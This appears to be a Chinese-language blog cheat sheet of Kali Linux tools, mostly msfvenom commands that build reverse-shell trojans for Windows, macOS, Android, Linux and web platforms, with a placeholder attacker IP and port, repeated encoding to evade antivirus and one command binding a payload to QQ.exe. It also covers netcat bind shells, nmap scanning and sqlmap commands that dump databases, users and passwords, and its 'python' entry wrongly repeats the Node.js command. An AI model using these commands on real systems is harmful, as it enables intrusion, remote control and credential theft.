精华内容
下载资源
问答
  • Kali 常用工具

    2020-09-19 15:13:51
    Metasploit Framework 开源工具,方便进行渗透测试。Ruby开发的 Auxiliaries(辅助模块):负责扫描、嗅探、指纹识别等功能 Exploit(漏洞利用模块):利用安全漏洞进行攻击行为 Payload(有效载荷模块):在渗透...

    MSF

    Metasploit Framework 开源工具,方便进行渗透测试。Ruby开发的

    Auxiliaries(辅助模块):负责扫描、嗅探、指纹识别等功能

    Exploit(漏洞利用模块):利用安全漏洞进行攻击行为

    Payload(有效载荷模块):在渗透攻击之后,用于在目标系统上执行任意命令或者执行特定的代码

    Post(后期渗透模块):用于在取得目标系统远程控制权限后,进行一系统的后渗透攻击动作

    Encoders(编码工具模块):主要负责免杀

    CVE

    Common Vulnerabiluities & Exposures(公共漏洞和暴露)

    为每个漏洞和暴露破了唯一的名称

    给每个漏洞和暴露一个标准化的描述

    不是一个数据库面,而是一个字典

    任何完全迥异的漏洞库都可以用同一个语言表述

    由于语言统一可以使得安全事件报告更好地被理解,实现更好的协调工作

    可以成为评价相应工具和数据库的基准

    MSF载荷选择

    windows/meterpreter/reverse_tcp

    java/meterpreter/reverse_tcp

    php/meterpreter/reverse_tcp

    php/meterpreter_reverse_tcp

    ruby/shell_reverse_tcp

    cmd/unix/interact

    cmd/unix/reverse

    cmd/unix/reverse_perl

    cmd/unix/reverse_netcat_gaping

    windows/meterpreter/reverse_nonx_tcp

    windows/meterpreter/reverse_ord_tcp

    windows/shell/reverse_tcp

    generic/shell_reverse_tcp

    msfvenom各平台木马生成

    windows

    msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b ‘x00x0axff’ -i 3 -f exe -o payload.exe — 编码3次以exe输出, 输文件名字叫payload

    msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -x D:/QQ.exe -i 5 -f exe -o c:/QQ1.exe —附加在qq.exe上,进行5次编码后以exe文件输出,输出的名字叫qq1

    mac

    msfvenom -a x86 —platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

    android

    msfvenom -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

    powershell

    msfvenom -a x86 —platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

    linux

    msfvenom -a x86 —platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

    php

    msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘n’ > shell.php && pbpaste >>shell.php

    aspx

    msfvenom -a x86 —platform windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

    jsp

    msfvenom —platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

    war

    msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.war

    node js

    msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw –o payload.js

    python

    msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw –o payload.js

    perl

    msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

    ruby

    msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

    lua

    msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

    windows shellCode

    msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

    Linux Shell

    msfvenom -a x86 —platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

    mac shell

    msfvenom -a x86 —platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IPLPORT=攻击机端口 -f c

    Nessus

    目前世界上最多人使用的系统漏洞扫描与分析软件

    号称世界上最流行的漏洞扫描程序

    Nessus提供了完整的漏洞扫描服务,并随时更新漏洞库。Nessus提供服务器和WEB客户端

    安装过程 :https://blog.csdn.net/wwl012345/article/details/96998187

    展开全文
  • kali 常用工具

    2019-10-12 14:22:30
  • kali常用工具】无线信号搜索工具 【kali常用工具】无线信号搜索工具 搜索当前范围的所有的WIFI信号 以及强度列表
  • KALI工具】inssider信号测试软件 测试当前范围内WIFI 信号强度小软件 对当前范围内WiFi进行检测
  • kali常用工具】EWSA 5.1.282-破包工具
  • kali常用工具】MAC地址修改工具 修改终端的Mac地址工具 保护自己的终端信息安全 不暴露
  • Kali常用工具1

    2020-07-12 02:36:32
    Kali常用工具arpingnetcatnmapsqlmap arping arping命令 必要参数 -f 得到第一个回复就退出 -c 发送的数据包的数目 范例1 : 发送ARP请求 [root@hnlinux ~]# arping 192.168.0.1 //向指定IP发送ARP请求 ARPING 192....

    Kali常用工具

    arping

    arping命令
    必要参数

    -f 得到第一个回复就退出
    -c 发送的数据包的数目
    

    范例1 : 发送ARP请求

    [root@hnlinux ~]# arping 192.168.0.1 //向指定IP发送ARP请求
    ARPING 192.168.0.1 from 192.168.0.3 eth0
    Unicast reply from 192.168.0.1 [00:21:27:9E:36:66] 2.480ms
    Unicast reply from 192.168.0.1 [00:21:27:9E:36:66] 2.387ms
    Unicast reply from 192.168.0.1 [00:21:27:9E:36:66] 1.459ms
    Unicast reply from 192.168.0.1 [00:21:27:9E:36:66] 1.494ms
    Sent 4 probes (1 broadcast(s))
    Received 4 response(s) //Ctrl+C 终止
    

    范例2 : 向指定主机发送ARP请求,当收到第一个包自动退出

    [root@hnlinux ~]# arping -f 192.168.0.1
    ARPING 192.168.0.1 from 192.168.0.3 eth0
    Unicast reply from 192.168.0.1 [00:21:27:9E:36:66] 0.692ms
    Sent 1 probes (1 broadcast(s))
    Received 1 response(s)
    

    范例3 : 指定发送次数

    [root@hnlinux ~]# arping -c 3 192.168.0.1 //指定发送3次
    ARPING 192.168.0.1 from 192.168.0.3 eth0
    Unicast reply from 192.168.0.1 [00:21:27:9E:36:66] 0.662ms
    Unicast reply from 192.168.0.1 [00:21:27:9E:36:66] 0.810ms
    Unicast reply from 192.168.0.1 [00:21:27:9E:36:66] 1.491ms
    Sent 3 probes (1 broadcast(s))
    Received 3 response(s)
    
    netcat

    格式:
    1.打开监听端口(创建nc连接)

    $nc  -l  -p(kali要加-p) ****(端口)
    

    2.连接端口(对话)

    $nc + 目标+ ip + 端口
    

    3.发送文件

    $nc -l 端口 < 文件
    

    4.接收文件

    $nc +目标ip + 端口 > 文件
    

    5.创建bash连接

    $nc -l 1567 -e /bin/bash -i
    

    6.连接bash

    $nc + 目标+ ip + 端口
    
    nmap


    nmap  192.168.1.0   -oG  -            //可以一行行显示,更直观
    nmap  -sn  -iL  test.txt                //-iL可以扫描指定文件中的IP地址
    nmap –sU  192.168.1.1               //扫描对方开放了哪些UDP端口
    nmap  -p  1-100,21,80  192.168.1.1     //可以查看指定端口是否开放及服务
    

    示例
    出现filtered 表示被过滤了
    扫描结果中,如果出现filtered 表示被过滤了,无法检测有没有开放
    -oG

    -oG - 再grep,可以方便查看需要的信息


    端口都是任意指定的,因为-sn就是不做端口扫描,不加端口也可以扫,但要注意UDP扫描的目标的端口如果是开放就不会有回应,不开放才有回应。

    tcp syn扫描:默认扫描模式,“半开放”扫描,不会在目标主机留下记录,必须有root权限

    tcp扫描:不需要任何权限,多线程,但是容易被发觉过滤

    nmap 192.168.1.1 //扫描对方开放了哪些端口服务
    nmap –sS 192.168.1.1 //通过TCP SYN方式扫描,在一定程度上防止被扫描目标主机识别和记录。
    nmap –sn 192.168.1.0/24 //只进行主机发现,不进行端口扫描,速度快,可以跨网段扫
    nmap –sP 192.168.1.0/24 //只进行主机发现,不进行端口扫描,速度很快,-sP表示设置扫描模式为ping扫描(实际测试禁止ping也可以)新版kaili中没有-sP,但还是可以执行,功能和-sn应该是一样,推荐使用-sn
    nmap –Pn 192.168.1.0/24 //扫描前不进行ping测试,默认主机存活,因为有些主机会禁止ping,以免漏扫
    nmap -O 192.168.1.1 //可以看到操作系统信息
    nmap -sV 192.168.1.1 //可以查看到端口上运行服务的软件版本
    nmap –A 192.168.1.1 // 比上面信息更详细,时间比较久,不轻易用
    nmap –oN 192.168.1.1 c:\123.txt //扫描结果会导出到123.txt文件,会自动创建
    nmap –sT 192.168.1.1 //扫描对方开放了哪些端口服务,时间较长,准确度高一些
    nmap -n 192.168.1.1 //不进行dns解析,如果nmap出现dns解析错误时要等很久,就要用该参数
    -v参数,对扫描结果进行详细输出,可以看到扫描过程

    sqlmap

    GET方式注入:

    sqlmap.py –u “URL”
    //URL不能是登录页面的,必须是验证页面的,账号密码错误的也可以

    sqlmap.py –u “URL” --dbs
    //查看服务器上有哪些数据库

    sqlmap.py –u “URL” --current-db
    //查看当前网站使用的是哪个数据库
    注意:如果不知道用户名密码,前面用的是登录不成功的URL,这里就查不出来了
    另外,当网站有防get注入的时候,这里也查不出来了,可以使用cookie注入方式

    sqlmap.py –u “URL” --current-user
    //查看当前数据库的用户(不是网站登录用户)

    sqlmap.py –u “URL” --users
    //查看数据库有哪些用户

    sqlmap.py –u “URL” --users --password
    //查看数据库有哪些用户及其密码(查询时选默认会自动破解加密的密码)

    sqlmap.py –u “URL” –D test --tables
    //查看test数据库下有哪些表

    sqlmap.py –u “URL” -D test -T stu --columns
    //查看test数据库下的stu表里有哪些字段

    sqlmap.py –u “URL” -D test -T stu --dump
    //查看stu表中的内容,如果表中字段太多还可以通过-D test -T stu -C “name,password”—dump,只列出想要的特定字段

    POST方式注入:
    sqlmap.py –u “URL” --data= ” ”
    //data里的内容为浏览器的form data数据,例如

    写成:sqlmap.py –u “URL” --data=“username=a&password=aaa” (注意格式)
    其使用方法和get方式一样

    cookie方式注入:
    sqlmap.py –u “URL” --cookie=” ”
    网站有防GET和POST注入时可以加此参数其使用方法不变(例如dvwa网站)

    –batch 所有对话框默认yes,自动执行
    注意:测试Get和post切换时必须删除浏览器缓存

    sqlmap -h
    -b –banner 检索数据库系统的标识
    –sql-shell 创建一个sql的shell,可以执行sql命令
    –os-shell
    –level 测试等级1-5,默认为1
    –risk 测试的风险0-3,默认为1,测试大部分的测试语句,2增加基于时间的测试语句,3增加or语句sql注入测试有可能改变数据。
    -f 可以查看到数据库版本

    –common-tables 暴力破解表名
    –common-columns 暴力破解列名
    以上应用在:Mysql版本小于5.0、Access数据库、当前用户没有权限读取系统中保存数据结构的表的权限

    展开全文
  • 包括nikto,dmitry,enum4linux,fping,masscan,nbtscan,nc
  • Realtek 8812AU KALI网卡驱动及安装教程 Realtek_WindowsDriver_1030.25.0701.2017.zip 8812AU设置kali的更新源+安装驱动 ok(1).docx 在ubuntu上安装rtl8812au.txt
  • flash插件(新版本kali似乎已经安装) qbittorrent 磁力种子下载工具 geany 图形化程序开发环境(支持C,CPP,Java,Python,PHP,HTML,DocBook,Perl,LaTeX 和 Bash脚本) stardict 星译王翻译软件 meld ...

    安装命令:

    sudo apt-get 软件名
    

    软件包:

    软件名 功能
    gdebi 图形化安装软件
    ibus / ibus-pinyin 输入法
    flashplugin-nonfree flash插件(新版本kali似乎已经安装)
    qbittorrent 磁力种子下载工具
    geany 图形化程序开发环境(支持C,CPP,Java,Python,PHP,HTML,DocBook,Perl,LaTeX 和 Bash脚本)
    stardict 星译王翻译软件
    meld 图形化文件差异比较
    kchmviewer chm文件阅读器
    freemind 思维导图
    mtr 路由追踪(类似traceroute)
    chromium 谷歌浏览器
    amule P2P文件共享软件
    monodevelop mono-gmcs -y .net开发环境
    filezilla filezilla-common ftp软件
    ttf-wqy-microhei 文泉驿微米黑(中文字体)
    smplayer 媒体播放器
    resolvconf dns 一键配置
    展开全文
  • 常用kali工具归纳

    2019-09-30 22:09:22
    转载于:https://www.cnblogs.com/jjj-fly/p/10584342.html
  • kali linux常用wifi攻击工具 转载于:https://www.cnblogs.com/lwmp/p/7553371.html
  • kali常用的ctf工具

    千次阅读 2017-09-27 13:53:00
    exiftool:查看图片的exif信息。...stegsolve.jar:kali中没有该工具,但是可以自己下 gimp:提供了转换各类图像文件可视化数据的功能,还可以用于确认文件是否是一个图像文件。 ImageMagick:工具集可以嵌入在脚本中...
  • kali常用攻击手段之Hping3攻击

    千次阅读 2020-03-22 14:37:52
    kali常用攻击手段之Hping3攻击 1.HPING3攻击 Hping3 是一个命令行下使用的 TCP/IP 数据包组装/凾析工具,通常 web服务会用来做压力测试使用,也可以迚行 DOS 攻击的实验。同样 Hping 只能每次扫描一个目标。 ...
  • Kali系统工具说明.docx

    2019-09-25 19:26:08
    文档里是对kali操作系统自带的工具的介绍、选项以及简单的使用说明,尽可能把所有工具都写了进去,常用工具都做了详细说明(图文并茂),不常用的也做了介绍说明,希望给予大家参考帮助
  • kali常用的扫描方式

    2020-03-22 14:52:55
    Nmap,也就是 Network Mapper,最早是 Linux 下的网络扫描和嗅探工具包。 nmap -sS xxxx(ip) #其中sS为半连接,这样更安全 nmap -sS xxxx(ip) -p xxx(端口) #可以接多个端口 2.NC扫描 nc 是 netcat 的简写,有着...
  • web 安全 kali 常用软件

    2017-03-31 17:50:13
    flashplugin-nonfree gdebi 图形化安装deb包 amule 电驴 qbittorrent bt geany 一个多语言的开发...比较两个文件差异的图形化工具 ttf-wqy-microhei windows常用的字体 kchmviewer 打开chm文件的 freemind n
  • Kali常用的代理工具以及使用

    千次阅读 2019-04-01 08:22:47
    常用的代理工具 Mitmproxy功能介绍 Mitmproxy功能使用 利用mitmproxy实现端口的监听 mitmproxy -p *(监听端口) 配置客户端:点击Menu->Preference->NetWork Proxy->Setting->Manual proxy ...
  • Kali 工具系列【3】kali Firefox浏览器下安装一些常用的渗透测试插件
  • kali dnsenum工具 具体使用方法

    千次阅读 2017-08-01 17:19:25
    dns是目前最主要的服务信息暴露来源 一般在做渗透测试前,所能了解到的信息或者说所...由于kali中一些工具的翻墙无法实现(即使在你挂了代理的情况下),所以最后一项的google引擎搜索基本作废。 一般还有一项常用

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 381
精华内容 152
关键字:

kali常用工具